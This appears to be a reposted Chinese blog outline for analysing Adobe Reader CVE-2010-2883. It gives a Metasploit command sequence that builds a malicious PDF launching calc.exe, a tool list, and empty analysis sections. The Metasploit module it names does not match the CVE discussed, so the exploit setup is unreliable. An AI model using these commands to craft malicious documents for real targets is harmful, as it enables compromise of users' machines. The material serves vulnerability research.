CVE-2010-2883

来源:互联网 发布:智慧的云计算 pdf 编辑:程序博客网 时间:2024/06/07 06:46


一 环境准备

 1  POC的准备

   我们需要在被攻击的机器上面弹出calc.exe

  

use exploit/windows/fileformat/adobe_utilprintfset FILENAME malicious.pdfset PAYLOAD windows/execset CMD calc.exeshow optionsexploit

2  Adober的准备

  AdbeRdr930_zh_CN.exe


3  PDFStreamDumper准备 

  PDFStreamDumper_Setup.exe,用于提取SING表。


4  IDA


5 OD


二  IDA 静态分析




三 OD动态调试



四 总结